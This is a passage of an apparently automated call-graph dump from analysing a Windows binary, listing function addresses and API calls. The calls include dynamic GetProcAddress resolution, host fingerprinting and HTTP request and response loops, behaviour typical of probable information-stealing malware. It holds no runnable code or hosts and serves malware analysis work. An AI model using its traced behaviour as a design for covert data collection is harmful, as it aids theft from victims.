14251->14252 14253 9e3528 14252->14253 14254 9e45c0 2 API calls 14253->14254 14255 9e3541 14254->14255 14256 9e45c0 2 API calls 14255->14256 14257 9e355a 14256->14257 14258 9e45c0 2 API calls 14257->14258 14259 9e3573 14258->14259 14260 9e45c0 2 API calls 14259->14260 14261 9e358c 14260->14261 14262 9e45c0 2 API calls 14261->14262 14263 9e35a5 14262->14263 14264 9e45c0 2 API calls 14263->14264 14265 9e35be 14264->14265 14266 9e45c0 2 API calls 14265->14266 14267 9e35d7 14266->14267 14268 9e45c0 2 API calls 14267->14268 14269 9e35f0 14268->14269 14270 9e45c0 2 API calls 14269->14270 14271 9e3609 14270->14271 14272 9e45c0 2 API calls 14271->14272 14273 9e3622 14272->14273 14274 9e45c0 2 API calls 14273->14274 14275 9e363b 14274->14275 14276 9e45c0 2 API calls 14275->14276 14277 9e3654 14276->14277 14278 9e45c0 2 API calls 14277->14278 14279 9e366d 14278->14279 14280 9e45c0 2 API calls 14279->14280 14281 9e3686 14280->14281 14282 9e45c0 2 API calls 14281->14282 14283 9e369f 14282->14283 14284 9e45c0 2 API calls 14283->14284 14285 9e36b8 14284->14285 14286 9e45c0 2 API calls 14285->14286 14287 9e36d1 14286->14287 14288 9e45c0 2 API calls 14287->14288 14289 9e36ea 14288->14289 14290 9e45c0 2 API calls 14289->14290 14291 9e3703 14290->14291 14292 9e45c0 2 API calls 14291->14292 14293 9e371c 14292->14293 14294 9e45c0 2 API calls 14293->14294 14295 9e3735 14294->14295 14296 9e45c0 2 API calls 14295->14296 14297 9e374e 14296->14297 14298 9e45c0 2 API calls 14297->14298 14299 9e3767 14298->14299 14300 9e45c0 2 API calls 14299->14300 14301 9e3780 14300->14301 14302 9e45c0 2 API calls 14301->14302 14303 9e3799 14302->14303 14304 9e45c0 2 API calls 14303->14304 14305 9e37b2 14304->14305 14306 9e45c0 2 API calls 14305->14306 14307 9e37cb 14306->14307 14308 9e45c0 2 API calls 14307->14308 14309 9e37e4 14308->14309 14310 9e45c0 2 API calls 14309->14310 14311 9e37fd 14310->14311 14312 9e45c0 2 API calls 14311->14312 14313 9e3816 14312->14313 14314 9e45c0 2 API calls 14313->14314 14315 9e382f 14314->14315 14316 9e45c0 2 API calls 14315->14316 14317 9e3848 14316->14317 14318 9e45c0 2 API calls 14317->14318 14319 9e3861 14318->14319 14320 9e45c0 2 API calls 14319->14320 14321 9e387a 14320->14321 14322 9e45c0 2 API calls 14321->14322 14323 9e3893 14322->14323 14324 9e45c0 2 API calls 14323->14324 14325 9e38ac 14324->14325 14326 9e45c0 2 API calls 14325->14326 14327 9e38c5 14326->14327 14328 9e45c0 2 API calls 14327->14328 14329 9e38de 14328->14329 14330 9e45c0 2 API calls 14329->14330 14331 9e38f7 14330->14331 14332 9e45c0 2 API calls 14331->14332 14333 9e3910 14332->14333 14334 9e45c0 2 API calls 14333->14334 14335 9e3929 14334->14335 14336 9e45c0 2 API calls 14335->14336 14337 9e3942 14336->14337 14338 9e45c0 2 API calls 14337->14338 14339 9e395b 14338->14339 14340 9e45c0 2 API calls 14339->14340 14341 9e3974 14340->14341 14342 9e45c0 2 API calls 14341->14342 14343 9e398d 14342->14343 14344 9e45c0 2 API calls 14343->14344 14345 9e39a6 14344->14345 14346 9e45c0 2 API calls 14345->14346 14347 9e39bf 14346->14347 14348 9e45c0 2 API calls 14347->14348 14349 9e39d8 14348->14349 14350 9e45c0 2 API calls 14349->14350 14351 9e39f1 14350->14351 14352 9e45c0 2 API calls 14351->14352 14353 9e3a0a 14352->14353 14354 9e45c0 2 API calls 14353->14354 14355 9e3a23 14354->14355 14356 9e45c0 2 API calls 14355->14356 14357 9e3a3c 14356->14357 14358 9e45c0 2 API calls 14357->14358 14359 9e3a55 14358->14359 14360 9e45c0 2 API calls 14359->14360 14361 9e3a6e 14360->14361 14362 9e45c0 2 API calls 14361->14362 14363 9e3a87 14362->14363 14364 9e45c0 2 API calls 14363->14364 14365 9e3aa0 14364->14365 14366 9e45c0 2 API calls 14365->14366 14367 9e3ab9 14366->14367 14368 9e45c0 2 API calls 14367->14368 14369 9e3ad2 14368->14369 14370 9e45c0 2 API calls 14369->14370 14371 9e3aeb 14370->14371 14372 9e45c0 2 API calls 14371->14372 14373 9e3b04 14372->14373 14374 9e45c0 2 API calls 14373->14374 14375 9e3b1d 14374->14375 14376 9e45c0 2 API calls 14375->14376 14377 9e3b36 14376->14377 14378 9e45c0 2 API calls 14377->14378 14379 9e3b4f 14378->14379 14380 9e45c0 2 API calls 14379->14380 14381 9e3b68 14380->14381 14382 9e45c0 2 API calls 14381->14382 14383 9e3b81 14382->14383 14384 9e45c0 2 API calls 14383->14384 14385 9e3b9a 14384->14385 14386 9e45c0 2 API calls 14385->14386 14387 9e3bb3 14386->14387 14388 9e45c0 2 API calls 14387->14388 14389 9e3bcc 14388->14389 14390 9e45c0 2 API calls 14389->14390 14391 9e3be5 14390->14391 14392 9e45c0 2 API calls 14391->14392 14393 9e3bfe 14392->14393 14394 9e45c0 2 API calls 14393->14394 14395 9e3c17 14394->14395 14396 9e45c0 2 API calls 14395->14396 14397 9e3c30 14396->14397 14398 9e45c0 2 API calls 14397->14398 14399 9e3c49 14398->14399 14400 9e45c0 2 API calls 14399->14400 14401 9e3c62 14400->14401 14402 9e45c0 2 API calls 14401->14402 14403 9e3c7b 14402->14403 14404 9e45c0 2 API calls 14403->14404 14405 9e3c94 14404->14405 14406 9e45c0 2 API calls 14405->14406 14407 9e3cad 14406->14407 14408 9e45c0 2 API calls 14407->14408 14409 9e3cc6 14408->14409 14410 9e45c0 2 API calls 14409->14410 14411 9e3cdf 14410->14411 14412 9e45c0 2 API calls 14411->14412 14413 9e3cf8 14412->14413 14414 9e45c0 2 API calls 14413->14414 14415 9e3d11 14414->14415 14416 9e45c0 2 API calls 14415->14416 14417 9e3d2a 14416->14417 14418 9e45c0 2 API calls 14417->14418 14419 9e3d43 14418->14419 14420 9e45c0 2 API calls 14419->14420 14421 9e3d5c 14420->14421 14422 9e45c0 2 API calls 14421->14422 14423 9e3d75 14422->14423 14424 9e45c0 2 API calls 14423->14424 14425 9e3d8e 14424->14425 14426 9e45c0 2 API calls 14425->14426 14427 9e3da7 14426->14427 14428 9e45c0 2 API calls 14427->14428 14429 9e3dc0 14428->14429 14430 9e45c0 2 API calls 14429->14430 14431 9e3dd9 14430->14431 14432 9e45c0 2 API calls 14431->14432 14433 9e3df2 14432->14433 14434 9e45c0 2 API calls 14433->14434 14435 9e3e0b 14434->14435 14436 9e45c0 2 API calls 14435->14436 14437 9e3e24 14436->14437 14438 9e45c0 2 API calls 14437->14438 14439 9e3e3d 14438->14439 14440 9e45c0 2 API calls 14439->14440 14441 9e3e56 14440->14441 14442 9e45c0 2 API calls 14441->14442 14443 9e3e6f 14442->14443 14444 9e45c0 2 API calls 14443->14444 14445 9e3e88 14444->14445 14446 9e45c0 2 API calls 14445->14446 14447 9e3ea1 14446->14447 14448 9e45c0 2 API calls 14447->14448 14449 9e3eba 14448->14449 14450 9e45c0 2 API calls 14449->14450 14451 9e3ed3 14450->14451 14452 9e45c0 2 API calls 14451->14452 14453 9e3eec 14452->14453 14454 9e45c0 2 API calls 14453->14454 14455 9e3f05 14454->14455 14456 9e45c0 2 API calls 14455->14456 14457 9e3f1e 14456->14457 14458 9e45c0 2 API calls 14457->14458 14459 9e3f37 14458->14459 14460 9e45c0 2 API calls 14459->14460 14461 9e3f50 14460->14461 14462 9e45c0 2 API calls 14461->14462 14463 9e3f69 14462->14463 14464 9e45c0 2 API calls 14463->14464 14465 9e3f82 14464->14465 14466 9e45c0 2 API calls 14465->14466 14467 9e3f9b 14466->14467 14468 9e45c0 2 API calls 14467->14468 14469 9e3fb4 14468->14469 14470 9e45c0 2 API calls 14469->14470 14471 9e3fcd 14470->14471 14472 9e45c0 2 API calls 14471->14472 14473 9e3fe6 14472->14473 14474 9e45c0 2 API calls 14473->14474 14475 9e3fff 14474->14475 14476 9e45c0 2 API calls 14475->14476 14477 9e4018 14476->14477 14478 9e45c0 2 API calls 14477->14478 14479 9e4031 14478->14479 14480 9e45c0 2 API calls 14479->14480 14481 9e404a 14480->14481 14482 9e45c0 2 API calls 14481->14482 14483 9e4063 14482->14483 14484 9e45c0 2 API calls 14483->14484 14485 9e407c 14484->14485 14486 9e45c0 2 API calls 14485->14486 14487 9e4095 14486->14487 14488 9e45c0 2 API calls 14487->14488 14489 9e40ae 14488->14489 14490 9e45c0 2 API calls 14489->14490 14491 9e40c7 14490->14491 14492 9e45c0 2 API calls 14491->14492 14493 9e40e0 14492->14493 14494 9e45c0 2 API calls 14493->14494 14495 9e40f9 14494->14495 14496 9e45c0 2 API calls 14495->14496 14497 9e4112 14496->14497 14498 9e45c0 2 API calls 14497->14498 14499 9e412b 14498->14499 14500 9e45c0 2 API calls 14499->14500 14501 9e4144 14500->14501 14502 9e45c0 2 API calls 14501->14502 14503 9e415d 14502->14503 14504 9e45c0 2 API calls 14503->14504 14505 9e4176 14504->14505 14506 9e45c0 2 API calls 14505->14506 14507 9e418f 14506->14507 14508 9e45c0 2 API calls 14507->14508 14509 9e41a8 14508->14509 14510 9e45c0 2 API calls 14509->14510 14511 9e41c1 14510->14511 14512 9e45c0 2 API calls 14511->14512 14513 9e41da 14512->14513 14514 9e45c0 2 API calls 14513->14514 14515 9e41f3 14514->14515 14516 9e45c0 2 API calls 14515->14516 14517 9e420c 14516->14517 14518 9e45c0 2 API calls 14517->14518 14519 9e4225 14518->14519 14520 9e45c0 2 API calls 14519->14520 14521 9e423e 14520->14521 14522 9e45c0 2 API calls 14521->14522 14523 9e4257 14522->14523 14524 9e45c0 2 API calls 14523->14524 14525 9e4270 14524->14525 14526 9e45c0 2 API calls 14525->14526 14527 9e4289 14526->14527 14528 9e45c0 2 API calls 14527->14528 14529 9e42a2 14528->14529 14530 9e45c0 2 API calls 14529->14530 14531 9e42bb 14530->14531 14532 9e45c0 2 API calls 14531->14532 14533 9e42d4 14532->14533 14534 9e45c0 2 API calls 14533->14534 14535 9e42ed 14534->14535 14536 9e45c0 2 API calls 14535->14536 14537 9e4306 14536->14537 14538 9e45c0 2 API calls 14537->14538 14539 9e431f 14538->14539 14540 9e45c0 2 API calls 14539->14540 14541 9e4338 14540->14541 14542 9e45c0 2 API calls 14541->14542 14543 9e4351 14542->14543 14544 9e45c0 2 API calls 14543->14544 14545 9e436a 14544->14545 14546 9e45c0 2 API calls 14545->14546 14547 9e4383 14546->14547 14548 9e45c0 2 API calls 14547->14548 14549 9e439c 14548->14549 14550 9e45c0 2 API calls 14549->14550 14551 9e43b5 14550->14551 14552 9e45c0 2 API calls 14551->14552 14553 9e43ce 14552->14553 14554 9e45c0 2 API calls 14553->14554 14555 9e43e7 14554->14555 14556 9e45c0 2 API calls 14555->14556 14557 9e4400 14556->14557 14558 9e45c0 2 API calls 14557->14558 14559 9e4419 14558->14559 14560 9e45c0 2 API calls 14559->14560 14561 9e4432 14560->14561 14562 9e45c0 2 API calls 14561->14562 14563 9e444b 14562->14563 14564 9e45c0 2 API calls 14563->14564 14565 9e4464 14564->14565 14566 9e45c0 2 API calls 14565->14566 14567 9e447d 14566->14567 14568 9e45c0 2 API calls 14567->14568 14569 9e4496 14568->14569 14570 9e45c0 2 API calls 14569->14570 14571 9e44af 14570->14571 14572 9e45c0 2 API calls 14571->14572 14573 9e44c8 14572->14573 14574 9e45c0 2 API calls 14573->14574 14575 9e44e1 14574->14575 14576 9e45c0 2 API calls 14575->14576 14577 9e44fa 14576->14577 14578 9e45c0 2 API calls 14577->14578 14579 9e4513 14578->14579 14580 9e45c0 2 API calls 14579->14580 14581 9e452c 14580->14581 14582 9e45c0 2 API calls 14581->14582 14583 9e4545 14582->14583 14584 9e45c0 2 API calls 14583->14584 14585 9e455e 14584->14585 14586 9e45c0 2 API calls 14585->14586 14587 9e4577 14586->14587 14588 9e45c0 2 API calls 14587->14588 14589 9e4590 14588->14589 14590 9e45c0 2 API calls 14589->14590 14591 9e45a9 14590->14591 14592 9f9c10 14591->14592 14593 9fa036 8 API calls 14592->14593 14594 9f9c20 43 API calls 14592->14594 14595 9fa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14593->14595 14596 9fa146 14593->14596 14594->14593 14595->14596 14597 9fa216 14596->14597 14598 9fa153 8 API calls 14596->14598 14599 9fa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14597->14599 14600 9fa298 14597->14600 14598->14597 14599->14600 14601 9fa337 14600->14601 14602 9fa2a5 6 API calls 14600->14602 14603 9fa41f 14601->14603 14604 9fa344 9 API calls 14601->14604 14602->14601 14605 9fa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14603->14605 14606 9fa4a2 14603->14606 14604->14603 14605->14606 14607 9fa4dc 14606->14607 14608 9fa4ab GetProcAddress GetProcAddress 14606->14608 14609 9fa515 14607->14609 14610 9fa4e5 GetProcAddress GetProcAddress 14607->14610 14608->14607 14611 9fa612 14609->14611 14612 9fa522 10 API calls 14609->14612 14610->14609 14613 9fa67d 14611->14613 14614 9fa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14611->14614 14612->14611 14615 9fa69e 14613->14615 14616 9fa686 GetProcAddress 14613->14616 14614->14613 14617 9f5ca3 14615->14617 14618 9fa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14615->14618 14616->14615 14619 9e1590 14617->14619 14618->14617 15738 9e1670 14619->15738 14622 9fa7a0 lstrcpy 14623 9e15b5 14622->14623 14624 9fa7a0 lstrcpy 14623->14624 14625 9e15c7 14624->14625 14626 9fa7a0 lstrcpy 14625->14626 14627 9e15d9 14626->14627 14628 9fa7a0 lstrcpy 14627->14628 14629 9e1663 14628->14629 14630 9f5510 14629->14630 14631 9f5521 14630->14631 14632 9fa820 2 API calls 14631->14632 14633 9f552e 14632->14633 14634 9fa820 2 API calls 14633->14634 14635 9f553b 14634->14635 14636 9fa820 2 API calls 14635->14636 14637 9f5548 14636->14637 14638 9fa740 lstrcpy 14637->14638 14639 9f5555 14638->14639 14640 9fa740 lstrcpy 14639->14640 14641 9f5562 14640->14641 14642 9fa740 lstrcpy 14641->14642 14643 9f556f 14642->14643 14644 9fa740 lstrcpy 14643->14644 14682 9f557c 14644->14682 14645 9fa820 lstrlen lstrcpy 14645->14682 14646 9fa740 lstrcpy 14646->14682 14647 9fa8a0 lstrcpy 14647->14682 14648 9f5643 StrCmpCA 14648->14682 14649 9f56a0 StrCmpCA 14650 9f57dc 14649->14650 14649->14682 14651 9fa8a0 lstrcpy 14650->14651 14652 9f57e8 14651->14652 14653 9fa820 2 API calls 14652->14653 14656 9f57f6 14653->14656 14654 9f5856 StrCmpCA 14657 9f5991 14654->14657 14654->14682 14655 9f51f0 20 API calls 14655->14682 14658 9fa820 2 API calls 14656->14658 14659 9fa8a0 lstrcpy 14657->14659 14660 9f5805 14658->14660 14662 9f599d 14659->14662 14661 9e1670 lstrcpy 14660->14661 14681 9f5811 14661->14681 14663 9fa820 2 API calls 14662->14663 14666 9f59ab 14663->14666 14664 9f5a0b StrCmpCA 14667 9f5a28 14664->14667 14668 9f5a16 Sleep 14664->14668 14665 9f52c0 25 API calls 14665->14682 14669 9fa820 2 API calls 14666->14669 14671 9fa8a0 lstrcpy 14667->14671 14668->14682 14670 9f59ba 14669->14670 14672 9e1670 lstrcpy 14670->14672 14673 9f5a34 14671->14673 14672->14681 14674 9fa820 2 API calls 14673->14674 14675 9f5a43 14674->14675 14676 9fa820 2 API calls 14675->14676 14677 9f5a52 14676->14677 14679 9e1670 lstrcpy 14677->14679 14678 9f578a StrCmpCA 14678->14682 14679->14681 14680 9fa7a0 lstrcpy 14680->14682 14681->13737 14682->14645 14682->14646 14682->14647 14682->14648 14682->14649 14682->14654 14682->14655 14682->14664 14682->14665 14682->14678 14682->14680 14683 9f593f StrCmpCA 14682->14683 14684 9e1590 lstrcpy 14682->14684 14683->14682 14684->14682 14686 9f754c 14685->14686 14687 9f7553 GetVolumeInformationA 14685->14687 14686->14687 14689 9f7591 14687->14689 14688 9f75fc GetProcessHeap RtlAllocateHeap 14690 9f7619 14688->14690 14691 9f7628 wsprintfA 14688->14691 14689->14688 14693 9fa740 lstrcpy 14690->14693 14692 9fa740 lstrcpy 14691->14692 14694 9f5da7 14692->14694 14693->14694 14694->13758 14696 9fa7a0 lstrcpy 14695->14696 14697 9e4899 14696->14697 15747 9e47b0 14697->15747 14699 9e48a5 14700 9fa740 lstrcpy 14699->14700 14701 9e48d7 14700->14701 14702 9fa740 lstrcpy 14701->14702 14703 9e48e4 14702->14703 14704 9fa740 lstrcpy 14703->14704 14705 9e48f1 14704->14705 14706 9fa740 lstrcpy 14705->14706 14707 9e48fe 14706->14707 14708 9fa740 lstrcpy 14707->14708 14709 9e490b InternetOpenA StrCmpCA 14708->14709 14710 9e4944 14709->14710 14711 9e4ecb InternetCloseHandle 14710->14711 15753 9f8b60 14710->15753 14713 9e4ee8 14711->14713 15768 9e9ac0 CryptStringToBinaryA 14713->15768 14714 9e4963 15761 9fa920 14714->15761 14717 9e4976 14719 9fa8a0 lstrcpy 14717->14719 14724 9e497f 14719->14724 14720 9fa820 2 API calls 14721 9e4f05 14720->14721 14723 9fa9b0 4 API calls 14721->14723 14722 9e4f27 ctype 14726 9fa7a0 lstrcpy 14722->14726 14725 9e4f1b 14723->14725 14728 9fa9b0 4 API calls 14724->14728 14727 9fa8a0 lstrcpy 14725->14727 14739 9e4f57 14726->14739 14727->14722 14729 9e49a9 14728->14729 14730 9fa8a0 lstrcpy 14729->14730 14731 9e49b2 14730->14731 14732 9fa9b0 4 API calls 14731->14732 14733 9e49d1 14732->14733 14734 9fa8a0 lstrcpy 14733->14734 14735 9e49da 14734->14735 14736 9fa920 3 API calls 14735->14736 14737 9e49f8 14736->14737 14738 9fa8a0 lstrcpy 14737->14738 14740 9e4a01 14738->14740 14739->13761 14741 9fa9b0 4 API calls 14740->14741 14742 9e4a20 14741->14742 14743 9fa8a0 lstrcpy 14742->14743 14744 9e4a29 14743->14744 14745 9fa9b0 4 API calls 14744->14745 14746 9e4a48 14745->14746 14747 9fa8a0 lstrcpy 14746->14747 14748 9e4a51 14747->14748 14749 9fa9b0 4 API calls 14748->14749 14750 9e4a7d 14749->14750 14751 9fa920 3 API calls 14750->14751 14752 9e4a84 14751->14752 14753 9fa8a0 lstrcpy 14752->14753 14754 9e4a8d 14753->14754 14755 9e4aa3 InternetConnectA 14754->14755 14755->14711 14756 9e4ad3 HttpOpenRequestA 14755->14756 14758 9e4ebe InternetCloseHandle 14756->14758 14759 9e4b28 14756->14759 14758->14711 14760 9fa9b0 4 API calls 14759->14760 14761 9e4b3c 14760->14761 14762 9fa8a0 lstrcpy 14761->14762 14763 9e4b45 14762->14763 14764 9fa920 3 API calls 14763->14764 14765 9e4b63 14764->14765 14766 9fa8a0 lstrcpy 14765->14766 14767 9e4b6c 14766->14767 14768 9fa9b0 4 API calls 14767->14768 14769 9e4b8b 14768->14769 14770 9fa8a0 lstrcpy 14769->14770 14771 9e4b94 14770->14771 14772 9fa9b0 4 API calls 14771->14772 14773 9e4bb5 14772->14773 14774 9fa8a0 lstrcpy 14773->14774 14775 9e4bbe 14774->14775 14776 9fa9b0 4 API calls 14775->14776 14777 9e4bde 14776->14777 14778 9fa8a0 lstrcpy 14777->14778 14779 9e4be7 14778->14779 14780 9fa9b0 4 API calls 14779->14780 14781 9e4c06 14780->14781 14782 9fa8a0 lstrcpy 14781->14782 14783 9e4c0f 14782->14783 14784 9fa920 3 API calls 14783->14784 14785 9e4c2d 14784->14785 14786 9fa8a0 lstrcpy 14785->14786 14787 9e4c36 14786->14787 14788 9fa9b0 4 API calls 14787->14788 14789 9e4c55 14788->14789 14790 9fa8a0 lstrcpy 14789->14790 14791 9e4c5e 14790->14791 14792 9fa9b0 4 API calls 14791->14792 14793 9e4c7d 14792->14793 14794 9fa8a0 lstrcpy 14793->14794 14795 9e4c86 14794->14795 14796 9fa920 3 API calls 14795->14796 14797 9e4ca4 14796->14797 14798 9fa8a0 lstrcpy 14797->14798 14799 9e4cad 14798->14799 14800 9fa9b0 4 API calls 14799->14800 14801 9e4ccc 14800->14801 14802 9fa8a0 lstrcpy 14801->14802 14803 9e4cd5 14802->14803 14804 9fa9b0 4 API calls 14803->14804 14805 9e4cf6 14804->14805 14806 9fa8a0 lstrcpy 14805->14806 14807 9e4cff 14806->14807 14808 9fa9b0 4 API calls 14807->14808 14809 9e4d1f 14808->14809 14810 9fa8a0 lstrcpy 14809->14810 14811 9e4d28 14810->14811 14812 9fa9b0 4 API calls 14811->14812 14813 9e4d47 14812->14813 14814 9fa8a0 lstrcpy 14813->14814 14815 9e4d50 14814->14815 14816 9fa920 3 API calls 14815->14816 14817 9e4d6e 14816->14817 14818 9fa8a0 lstrcpy 14817->14818 14819 9e4d77 14818->14819 14820 9fa740 lstrcpy 14819->14820 14821 9e4d92 14820->14821 14822 9fa920 3 API calls 14821->14822 14823 9e4db3 14822->14823 14824 9fa920 3 API calls 14823->14824 14825 9e4dba 14824->14825 14826 9fa8a0 lstrcpy 14825->14826 14827 9e4dc6 14826->14827 14828 9e4de7 lstrlen 14827->14828 14829 9e4dfa 14828->14829 14830 9e4e03 lstrlen 14829->14830 15767 9faad0 14830->15767 14832 9e4e13 HttpSendRequestA 14833 9e4e32 InternetReadFile 14832->14833 14834 9e4e67 InternetCloseHandle 14833->14834 14839 9e4e5e 14833->14839 14836 9fa800 14834->14836 14836->14758 14837 9fa9b0 4 API calls 14837->14839 14838 9fa8a0 lstrcpy 14838->14839 14839->14833 14839->14834 14839->14837 14839->14838 15774 9faad0 14840->15774 14842 9f17c4 StrCmpCA 14843 9f17cf ExitProcess 14842->14843 14844 9f17d7 14842->14844 14845 9f19c2 14844->14845 14846 9f187f StrCmpCA 14844->14846 14847 9f185d StrCmpCA 14844->14847 14848 9f1913 StrCmpCA 14844->14848 14849 9f1932 StrCmpCA 14844->14849 14850 9f18f1 StrCmpCA 14844->14850 14851 9f1951 StrCmpCA 14844->14851 14852 9f1970 StrCmpCA 14844->14852 14853 9f18cf StrCmpCA 14844->14853 14854 9f18ad StrCmpCA 14844->14854 14855 9fa820 lstrlen lstrcpy 14844->14855 14845->13763 14846->14844 14847->14844 14848->14844 14849->14844 14850->14844 14851->14844 14852->14844 14853->14844 14854->14844 14855->14844 14857 9fa7a0 lstrcpy 14856->14857 14858 9e5979 14857->14858 14859 9e47b0 2 API calls 14858->14859 14860 9e5985 14859->14860 14861 9fa740 lstrcpy 14860->14861 14862 9e59ba 14861->14862 14863 9fa740 lstrcpy 14862->14863 14864 9e59c7 14863->14864 14865 9fa740 lstrcpy 14864->14865 14866 9e59d4 14865->14866 14867 9fa740 lstrcpy 14866->14867 14868 9e59e1 14867->14868 14869 9fa740 lstrcpy 14868->14869 14870 9e59ee InternetOpenA StrCmpCA 14869->14870 14871 9e5a1d 14870->14871 14872 9e5fc3 InternetCloseHandle 14871->14872 14874 9f8b60 3 API calls 14871->14874 14873 9e5fe0 14872->14873 14877 9e9ac0 4 API calls 14873->14877 14875 9e5a3c 14874->14875 14876 9fa920 3 API calls 14875->14876 14878 9e5a4f 14876->14878 14879 9e5fe6 14877->14879 14880 9fa8a0 lstrcpy 14878->14880 14881 9fa820 2 API calls 14879->14881 14883 9e601f ctype 14879->14883 14885 9e5a58 14880->14885 14882 9e5ffd 14881->14882 14884 9fa9b0 4 API calls 14882->14884 14887 9fa7a0 lstrcpy 14883->14887 14886 9e6013 14884->14886 14889 9fa9b0 4 API calls 14885->14889 14888 9fa8a0 lstrcpy 14886->14888 14897 9e604f 14887->14897 14888->14883 14890 9e5a82 14889->14890 14891 9fa8a0 lstrcpy 14890->14891 14892 9e5a8b 14891->14892 14893 9fa9b0 4 API calls 14892->14893 14894 9e5aaa 14893->14894 14895 9fa8a0 lstrcpy 14894->14895 14896 9e5ab3 14895->14896 14898 9fa920 3 API calls 14896->14898 14897->13769 14899 9e5ad1 14898->14899 14900 9fa8a0 lstrcpy 14899->14900 14901 9e5ada 14900->14901 14902 9fa9b0 4 API calls 14901->14902 14903 9e5af9 14902->14903 14904 9fa8a0 lstrcpy 14903->14904 14905 9e5b02 14904->14905 14906 9fa9b0 4 API calls 14905->14906 14907 9e5b21 14906->14907 14908 9fa8a0 lstrcpy 14907->14908 14909 9e5b2a 14908->14909 14910 9fa9b0 4 API calls 14909->14910 14911 9e5b56 14910->14911 14912 9fa920 3 API calls 14911->14912 14913 9e5b5d 14912->14913 14914 9fa8a0 lstrcpy 14913->14914 14915 9e5b66 14914->14915 14916 9e5b7c InternetConnectA 14915->14916 14916->14872 14917 9e5bac HttpOpenRequestA 14916->14917 14919 9e5c0b 14917->14919 14920 9e5fb6 InternetCloseHandle 14917->14920 14921 9fa9b0 4 API calls 14919->14921 14920->14872 14922 9e5c1f 14921->14922 14923 9fa8a0 lstrcpy 14922->14923 14924 9e5c28 14923->14924 14925 9fa920 3 API calls 14924->14925 14926 9e5c46 14925->14926 14927 9fa8a0 lstrcpy 14926->14927 14928 9e5c4f 14927->14928 14929 9fa9b0 4 API calls 14928->14929 14930 9e5c6e 14929->14930 14931 9fa8a0 lstrcpy 14930->14931 14932 9e5c77 14931->14932 14933 9fa9b0 4 API calls 14932->14933 14934 9e5c98 14933->14934 14935 9fa8a0 lstrcpy 14934->14935 14936 9e5ca1 14935->14936 14937 9fa9b0 4 API calls 14936->14937 14938 9e5cc1 14937->14938 14939 9fa8a0 lstrcpy 14938->14939 14940 9e5cca 14939->14940 14941 9fa9b0 4 API calls 14940->14941 14942 9e5ce9 14941->14942 14943 9fa8a0 lstrcpy 14942->14943 14944 9e5cf2 14943->14944 14945 9fa920 3 API calls 14944->14945 14946 9e5d10 14945->14946 14947 9fa8a0 lstrcpy 14946->14947 14948 9e5d19 14947->14948 14949 9fa9b0 4 API calls 14948->14949 14950 9e5d38 14949->14950 14951 9fa8a0 lstrcpy 14950->14951 14952 9e5d41 14951->14952 14953 9fa9b0 4 API calls 14952->14953 14954 9e5d60 14953->14954 14955 9fa8a0 lstrcpy 14954->14955 14956 9e5d69 14955->14956 14957 9fa920 3 API calls 14956->14957 14958 9e5d87 14957->14958 14959 9fa8a0 lstrcpy 14958->14959 14960 9e5d90 14959->14960 14961 9fa9b0 4 API calls 14960->14961 14962 9e5daf 14961->14962 14963 9fa8a0 lstrcpy 14962->14963 14964 9e5db8 14963->14964 14965 9fa9b0 4 API calls 14964->14965 14966 9e5dd9 14965->14966 14967 9fa8a0 lstrcpy 14966->14967 14968 9e5de2 14967->14968 14969 9fa9b0 4 API calls 14968->14969 14970 9e5e02 14969->14970 14971 9fa8a0 lstrcpy 14970->14971 14972 9e5e0b 14971->14972 14973 9fa9b0 4 API calls 14972->14973 14974 9e5e2a 14973->14974 14975 9fa8a0 lstrcpy 14974->14975 14976 9e5e33 14975->14976 14977 9fa920 3 API calls 14976->14977 14978 9e5e54 14977->14978 14979 9fa8a0 lstrcpy 14978->14979 14980 9e5e5d 14979->14980 14981 9e5e70 lstrlen 14980->14981 15775 9faad0 14981->15775 14983 9e5e81 lstrlen GetProcessHeap RtlAllocateHeap 15776 9faad0 14983->15776 14985 9e5eae lstrlen 14986 9e5ebe 14985->14986 14987 9e5ed7 lstrlen 14986->14987 14988 9e5ee7 14987->14988 14989 9e5ef0 lstrlen 14988->14989 14990 9e5f03 14989->14990 14991 9e5f1a lstrlen 14990->14991 15777 9faad0 14991->15777 14993 9e5f2a HttpSendRequestA 14994 9e5f35 InternetReadFile 14993->14994 14995 9e5f6a InternetCloseHandle 14994->14995 14999 9e5f61 14994->14999 14995->14920 14997 9fa9b0 4 API calls 14997->14999 14998 9fa8a0 lstrcpy 14998->14999 14999->14994 14999->14995 14999->14997 14999->14998 15001 9f1077 15000->15001 15002 9f1151 15001->15002 15003 9fa820 lstrlen lstrcpy 15001->15003 15002->13771 15003->15001 15005 9f0db7 15004->15005 15006 9f0f17 15005->15006 15007 9f0e27 StrCmpCA 15005->15007 15008 9f0e67 StrCmpCA 15005->15008 15009 9f0ea4 StrCmpCA 15005->15009 15010 9fa820 lstrlen lstrcpy 15005->15010 15006->13779 15007->15005 15008->15005 15009->15005 15010->15005 15012 9f0f67 15011->15012 15013 9f1044 15012->15013 15014 9f0fb2 StrCmpCA 15012->15014 15015 9fa820 lstrlen lstrcpy 15012->15015 15013->13787 15014->15012 15015->15012 15017 9fa740 lstrcpy 15016->15017 15018 9f1a26 15017->15018 15019 9fa9b0 4 API calls 15018->15019 15020 9f1a37 15019->15020 15021 9fa8a0 lstrcpy 15020->15021 15022 9f1a40 15021->15022 15023 9fa9b0 4 API calls 15022->15023 15024 9f1a5b 15023->15024 15025 9fa8a0 lstrcpy 15024->15025 15026 9f1a64 15025->15026 15027 9fa9b0 4 API calls 15026->15027 15028 9f1a7d 15027->15028 15029 9fa8a0 lstrcpy 15028->15029 15030 9f1a86 15029->15030 15031 9fa9b0 4 API calls 15030->15031 15032 9f1aa1 15031->15032 15033 9fa8a0 lstrcpy 15032->15033 15034 9f1aaa 15033->15034 15035 9fa9b0 4 API calls 15034->15035 15036 9f1ac3 15035->15036 15037 9fa8a0 lstrcpy 15036->15037 15038 9f1acc 15037->15038 15039 9fa9b0 4 API calls 15038->15039 15040 9f1ae7 15039->15040 15041 9fa8a0 lstrcpy 15040->15041 15042 9f1af0 15041->15042 15043 9fa9b0 4 API calls 15042->15043 15044 9f1b09 15043->15044 15045 9fa8a0 lstrcpy 15044->15045 15046 9f1b12 15045->15046 15047 9fa9b0 4 API calls 15046->15047 15048 9f1b2d 15047->15048 15049 9fa8a0 lstrcpy 15048->15049 15050 